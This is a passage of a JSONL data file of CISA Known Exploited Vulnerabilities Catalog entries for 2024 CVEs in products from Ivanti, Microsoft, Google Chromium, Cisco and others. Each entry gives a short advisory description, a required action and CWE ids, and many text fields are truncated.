unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-45519", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-29824", "text": "Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability\n\nAffected: Ivanti Endpoint Manager (EPM)\n\nIvanti Endpoint Manager (EPM) contains a SQL injection vulnerability in Core server that allows an unauthenticated attacker within the same network to execute arbitrary code. \n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-89\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-29824", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-7593", "text": "Ivanti Virtual Traffic Manager Authentication Bypass Vulnerability\n\nAffected: Ivanti Virtual Traffic Manager\n\nIvanti Virtual Traffic Manager contains an authentication bypass vulnerability that allows a remote, unauthenticated attacker to create a chosen administrator account.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-287, CWE-303\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-7593", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-8963", "text": "Ivanti Cloud Services Appliance (CSA) Path Traversal Vulnerability\n\nAffected: Ivanti Cloud Services Appliance (CSA)\n\nIvanti Cloud Services Appliance (CSA) contains a path traversal vulnerability that could allow a remote, unauthenticated attacker to access restricted functionality. If CVE-2024-8963 is used in conjunction with CVE-2024-8190, an attacker could bypass admin authentication and execute arbitrary commands on the appliance.\n\nRequired Action: As Ivanti CSA has reached End-of-Life status", "cve_id": "CVE-2024-8963", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-27348", "text": "Apache HugeGraph-Server Improper Access Control Vulnerability\n\nAffected: Apache HugeGraph-Server\n\nApache HugeGraph-Server contains an improper access control vulnerability that could allow a remote attacker to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-27348", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-6670", "text": "Progress WhatsUp Gold SQL Injection Vulnerability\n\nAffected: Progress WhatsUp Gold\n\nProgress WhatsUp Gold contains a SQL injection vulnerability that allows an unauthenticated attacker to retrieve the user's encrypted password if the application is configured with only a single user.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-89\n\n[Source: CISA Known Exploited Vulnerabilities Catalog", "cve_id": "CVE-2024-6670", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-43461", "text": "Microsoft Windows MSHTML Platform Spoofing Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows MSHTML Platform contains a user interface (UI) misrepresentation of critical information vulnerability that allows an attacker to spoof a web page. This vulnerability was exploited in conjunction with CVE-2024-38112.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-451\n\n[Source: CISA Known Exploited Vuln", "cve_id": "CVE-2024-43461", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-8190", "text": "Ivanti Cloud Services Appliance OS Command Injection Vulnerability\n\nAffected: Ivanti Cloud Services Appliance\n\nIvanti Cloud Services Appliance (CSA) contains an OS command injection vulnerability in the administrative console which can allow an authenticated attacker with application admin privileges to pass commands to the underlying OS.\n\nRequired Action: As Ivanti CSA has reached End-of-Life status, users are urged to remove CSA 4.6.x from service or upgrade to the 5.0.x line of supported solu", "cve_id": "CVE-2024-8190", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38217", "text": "Microsoft Windows Mark of the Web (MOTW) Protection Mechanism Failure Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Mark of the Web (MOTW) contains a protection mechanism failure vulnerability that allows an attacker to bypass MOTW-based defenses. This can result in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use ", "cve_id": "CVE-2024-38217", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38014", "text": "Microsoft Windows Installer Improper Privilege Management Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Installer contains an improper privilege management vulnerability that could allow an attacker to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-269\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38014", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38226", "text": "Microsoft Publisher Protection Mechanism Failure Vulnerability\n\nAffected: Microsoft Publisher\n\nMicrosoft Publisher contains a protection mechanism failure vulnerability that allows attacker to bypass Office macro policies used to block untrusted or malicious files.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-693\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38226", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-40766", "text": "SonicWall SonicOS Improper Access Control Vulnerability\n\nAffected: SonicWall SonicOS\n\nSonicWall SonicOS contains an improper access control vulnerability that could lead to unauthorized resource access and, under certain conditions, may cause the firewall to crash.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-40766", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-7262", "text": "Kingsoft WPS Office Path Traversal Vulnerability\n\nAffected: Kingsoft WPS Office\n\nKingsoft WPS Office contains a path traversal vulnerability in promecefpluginhost.exe on Windows that allows an attacker to load an arbitrary Windows library.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-7262", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-7965", "text": "Google Chromium V8 Inappropriate Implementation Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains an inappropriate implementation vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the pro", "cve_id": "CVE-2024-7965", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38856", "text": "Apache OFBiz Incorrect Authorization Vulnerability\n\nAffected: Apache OFBiz\n\nApache OFBiz contains an incorrect authorization vulnerability that could allow remote code execution via a Groovy payload in the context of the OFBiz user process by an unauthenticated attacker.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-863\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38856", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-7971", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains a type confusion vulnerability that allows a remote attacker to exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE", "cve_id": "CVE-2024-7971", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-39717", "text": "Versa Director Dangerous File Type Upload Vulnerability\n\nAffected: Versa Director\n\nThe Versa Director GUI contains an unrestricted upload of file with dangerous type vulnerability that allows administrators with Provider-Data-Center-Admin or Provider-Data-Center-System-Admin privileges to customize the user interface. The “Change Favicon” (Favorite Icon) enables the upload of a .png file, which can be exploited to upload a malicious file with a .png extension disguised as an image.\n\nRequired Act", "cve_id": "CVE-2024-39717", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23897", "text": "Jenkins Command Line Interface (CLI) Path Traversal Vulnerability\n\nAffected: Jenkins Jenkins Command Line Interface (CLI)\n\nJenkins Command Line Interface (CLI) contains a path traversal vulnerability that allows attackers limited read access to certain files, which can lead to code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-27\n\n[Source: CISA Known Exploited Vulnerabilitie", "cve_id": "CVE-2024-23897", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-28986", "text": "SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability\n\nAffected: SolarWinds Web Help Desk\n\nSolarWinds Web Help Desk contains a deserialization of untrusted data vulnerability that could allow for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-28986", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38107", "text": "Microsoft Windows Power Dependency Coordinator Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Power Dependency Coordinator contains an unspecified vulnerability that allows for privilege escalation, enabling a local attacker to obtain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38107", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38106", "text": "Microsoft Windows Kernel Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Kernel contains an unspecified vulnerability that allows for privilege escalation, enabling a local attacker to gain SYSTEM privileges. Successful exploitation of this vulnerability requires an attacker to win a race condition.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-591\n\n[Source: CISA Known ", "cve_id": "CVE-2024-38106", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38193", "text": "Microsoft Windows Ancillary Function Driver for WinSock Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Ancillary Function Driver for WinSock contains an unspecified vulnerability that allows for privilege escalation, enabling a local attacker to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Cata", "cve_id": "CVE-2024-38193", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38213", "text": "Microsoft Windows SmartScreen Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows SmartScreen contains a security feature bypass vulnerability that allows an attacker to bypass the SmartScreen user experience via a malicious file.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-693\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38213", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38178", "text": "Microsoft Windows Scripting Engine Memory Corruption Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Scripting Engine contains a memory corruption vulnerability that allows unauthenticated attacker to initiate remote code execution via a specially crafted URL.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38178", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38189", "text": "Microsoft Project Remote Code Execution Vulnerability \n\nAffected: Microsoft Project\n\nMicrosoft Project contains an unspecified vulnerability that allows for remote code execution via a malicious file.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38189", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-32113", "text": "Apache OFBiz Path Traversal Vulnerability\n\nAffected: Apache OFBiz\n\nApache OFBiz contains a path traversal vulnerability that could allow for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-32113", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-36971", "text": "Android Kernel Remote Code Execution Vulnerability\n\nAffected: Android Kernel\n\nAndroid contains an unspecified vulnerability in the kernel that allows for remote code execution. This vulnerability resides in Linux Kernel and could impact other products, including but not limited to Android OS.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-36971", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-37085", "text": "VMware ESXi Authentication Bypass Vulnerability\n\nAffected: VMware ESXi\n\nVMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigati", "cve_id": "CVE-2024-37085", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-5217", "text": "ServiceNow Incomplete List of Disallowed Inputs Vulnerability\n\nAffected: ServiceNow Utah, Vancouver, and Washington DC Now Platform\n\nServiceNow Washington DC, Vancouver, and earlier Now Platform releases contain an incomplete list of disallowed inputs vulnerability in the GlideExpression script. An unauthenticated user could exploit this vulnerability to execute code remotely.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavail", "cve_id": "CVE-2024-5217", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4879", "text": "ServiceNow Improper Input Validation Vulnerability\n\nAffected: ServiceNow Utah, Vancouver, and Washington DC Now Platform\n\nServiceNow Utah, Vancouver, and Washington DC Now Platform releases contain a jelly template injection vulnerability in UI macros. An unauthenticated user could exploit this vulnerability to execute code remotely. \n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-1287\n\n[Source: CISA Know", "cve_id": "CVE-2024-4879", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-39891", "text": "Twilio Authy Information Disclosure Vulnerability\n\nAffected: Twilio Authy\n\nTwilio Authy contains an information disclosure vulnerability in its API that allows an unauthenticated endpoint to accept a request containing a phone number and respond with information about whether the phone number was registered with Authy.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-203\n\n[Source: CISA Known Exploited Vulne", "cve_id": "CVE-2024-39891", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-28995", "text": "SolarWinds Serv-U Path Traversal Vulnerability \n\nAffected: SolarWinds Serv-U\n\nSolarWinds Serv-U contains a path traversal vulnerability that allows an attacker access to read sensitive files on the host machine.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-28995", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-34102", "text": "Adobe Commerce and Magento Open Source Improper Restriction of XML External Entity Reference (XXE) Vulnerability\n\nAffected: Adobe Commerce and Magento Open Source\n\nAdobe Commerce and Magento Open Source contain an improper restriction of XML external entity reference (XXE) vulnerability that allows for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-611\n\n[Source: CISA Known Exploited", "cve_id": "CVE-2024-34102", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-36401", "text": "OSGeo GeoServer GeoTools Eval Injection Vulnerability\n\nAffected: OSGeo GeoServer\n\nOSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): ", "cve_id": "CVE-2024-36401", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-23692", "text": "Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability\n\nAffected: Rejetto HTTP File Server\n\nRejetto HTTP File Server contains an improper neutralization of special elements used in a template engine vulnerability. This allows a remote, unauthenticated attacker to execute commands on the affected system by sending a specially crafted HTTP request.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if ", "cve_id": "CVE-2024-23692", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38080", "text": "Microsoft Windows Hyper-V Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Hyper-V contains a privilege escalation vulnerability that allows a local attacker with user permissions to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-190\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38080", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38112", "text": "Microsoft Windows MSHTML Platform Spoofing Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows MSHTML Platform contains a spoofing vulnerability that has a high impact to confidentiality, integrity, and availability.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-451\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-38112", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-20399", "text": "Cisco NX-OS Command Injection Vulnerability\n\nAffected: Cisco NX-OS\n\nCisco NX-OS contains a command injection vulnerability in the command line interface (CLI) that could allow an authenticated, local attacker to execute commands as root on the underlying operating system of an affected device.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-20399", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4358", "text": "Progress Telerik Report Server Authentication Bypass by Spoofing Vulnerability\n\nAffected: Progress Telerik Report Server\n\nProgress Telerik Report Server contains an authorization bypass by spoofing vulnerability that allows an attacker to obtain unauthorized access.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-290\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-4358", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-26169", "text": "Microsoft Windows Error Reporting Service Improper Privilege Management Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Error Reporting Service contains an improper privilege management vulnerability that allows a local attacker with user permissions to gain SYSTEM privileges.\n\nRequired Action: Apply updates per vendor instructions or discontinue use of the product if updates are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-269\n\n[Source: CISA Known Exploited Vulnerabilities Catalog", "cve_id": "CVE-2024-26169", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-32896", "text": "Android Pixel Privilege Escalation Vulnerability\n\nAffected: Android Pixel\n\nAndroid Pixel contains an unspecified vulnerability in the firmware that allows for privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-783\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-32896", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4577", "text": "PHP-CGI OS Command Injection Vulnerability\n\nAffected: PHP Group PHP\n\nPHP, specifically Windows-based PHP used in CGI mode, contains an OS command injection vulnerability that allows for arbitrary code execution. This vulnerability is a patch bypass for CVE-2012-1823.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-4577", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4610", "text": "Arm Mali GPU Kernel Driver Use-After-Free Vulnerability\n\nAffected: Arm Mali GPU Kernel Driver\n\nArm Bifrost and Valhall GPU kernel drivers contain a use-after-free vulnerability that allows a local, non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Ca", "cve_id": "CVE-2024-4610", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-1086", "text": "Linux Kernel Use-After-Free Vulnerability\n\nAffected: Linux Kernel\n\nLinux kernel contains a use-after-free vulnerability in the netfilter: nf_tables component that allows an attacker to achieve local privilege escalation.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-1086", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-24919", "text": "Check Point Quantum Security Gateways Information Disclosure Vulnerability\n\nAffected: Check Point Quantum Security Gateways\n\nCheck Point Quantum Security Gateways contain an unspecified information disclosure vulnerability. The vulnerability potentially allows an attacker to access information on Gateways connected to the internet, with IPSec VPN, Remote Access VPN or Mobile Access enabled. This issue affects several product lines from Check Point, including CloudGuard Network, Quantum Scalable ", "cve_id": "CVE-2024-24919", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4978", "text": "Justice AV Solutions (JAVS) Viewer Installer Embedded Malicious Code Vulnerability\n\nAffected: Justice AV Solutions Viewer\n\nJustice AV Solutions (JAVS) Viewer installer contains a malicious version of ffmpeg.exe, named fffmpeg.exe (SHA256: 421a4ad2615941b177b6ec4ab5e239c14e62af2ab07c6df1741e2a62223223c4). When run, this creates a backdoor connection to a malicious C2 server.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailabl", "cve_id": "CVE-2024-4978", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-5274", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains a type confusion vulnerability that allows a remote attacker to execute code via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-84", "cve_id": "CVE-2024-5274", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4947", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains a type confusion vulnerability that allows a remote attacker to execute code via a crafted HTML page.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-4947", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4761", "text": "Google Chromium V8 Out-of-Bounds Memory Write Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains an unspecified out-of-bounds memory write vulnerability via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera. \n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787", "cve_id": "CVE-2024-4761", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-30040", "text": "Microsoft Windows MSHTML Platform Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows MSHTML Platform contains an unspecified vulnerability that allows for a security feature bypass.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-30040", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-30051", "text": " Microsoft DWM Core Library Privilege Escalation Vulnerability\n\nAffected: Microsoft DWM Core Library\n\nMicrosoft DWM Core Library contains a privilege escalation vulnerability that allows an attacker to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-30051", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4671", "text": "Google Chromium Visuals Use-After-Free Vulnerability\n\nAffected: Google Chromium\n\nGoogle Chromium Visuals contains a use-after-free vulnerability that allows a remote attacker to exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailabl", "cve_id": "CVE-2024-4671", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-29988", "text": "Microsoft SmartScreen Prompt Security Feature Bypass Vulnerability\n\nAffected: Microsoft SmartScreen Prompt\n\nMicrosoft SmartScreen Prompt contains a security feature bypass vulnerability that allows an attacker to bypass the Mark of the Web (MotW) feature. This vulnerability can be chained with CVE-2023-38831 and CVE-2024-21412 to execute a malicious file.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-693", "cve_id": "CVE-2024-29988", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4040", "text": "CrushFTP VFS Sandbox Escape Vulnerability\n\nAffected: CrushFTP CrushFTP\n\nCrushFTP contains an unspecified sandbox escape vulnerability that allows a remote attacker to escape the CrushFTP virtual file system (VFS).\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-1336\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-4040", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-20359", "text": "Cisco ASA and FTD Privilege Escalation Vulnerability\n\nAffected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\n\nCisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain a privilege escalation vulnerability that can allow local privilege escalation from Administrator to root.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploit", "cve_id": "CVE-2024-20359", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-20353", "text": "Cisco ASA and FTD Denial of Service Vulnerability\n\nAffected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\n\nCisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an infinite loop vulnerability that can lead to remote denial of service condition.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-835\n\n[Source: CISA Known Exploited Vulnerabilities Catalo", "cve_id": "CVE-2024-20353", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-3400", "text": "Palo Alto Networks PAN-OS Command Injection Vulnerability\n\nAffected: Palo Alto Networks PAN-OS\n\nPalo Alto Networks PAN-OS GlobalProtect feature contains a command injection vulnerability that allows an unauthenticated attacker to execute commands with root privileges on the firewall.\n\nRequired Action: Apply mitigations per vendor instructions as they become available. Otherwise, users with vulnerable versions of affected devices should enable Threat Prevention IDs available from the vendor. See ", "cve_id": "CVE-2024-3400", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-3273", "text": "D-Link Multiple NAS Devices Command Injection Vulnerability\n\nAffected: D-Link Multiple NAS Devices\n\nD-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L contain a command injection vulnerability. When combined with CVE-2024-3272, this can lead to remote, unauthorized code execution.\n\nRequired Action: This vulnerability affects legacy D-Link products. All associated hardware revisions have reached their end-of-life (EOL) or end-of-service (EOS) life cycle and should be retired and replaced per vendor", "cve_id": "CVE-2024-3273", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-3272", "text": "D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability\n\nAffected: D-Link Multiple NAS Devices\n\nD-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L contains a hard-coded credential that allows an attacker to conduct authenticated command injection, leading to remote, unauthorized code execution.\n\nRequired Action: This vulnerability affects legacy D-Link products. All associated hardware revisions have reached their end-of-life (EOL) or end-of-service (EOS) life cycle and should be r", "cve_id": "CVE-2024-3272", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-29748", "text": "Android Pixel Privilege Escalation Vulnerability\n\nAffected: Android Pixel\n\nAndroid Pixel contains a privilege escalation vulnerability that allows an attacker to interrupt a factory reset triggered by a device admin app.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-280\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-29748", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-29745", "text": "Android Pixel Information 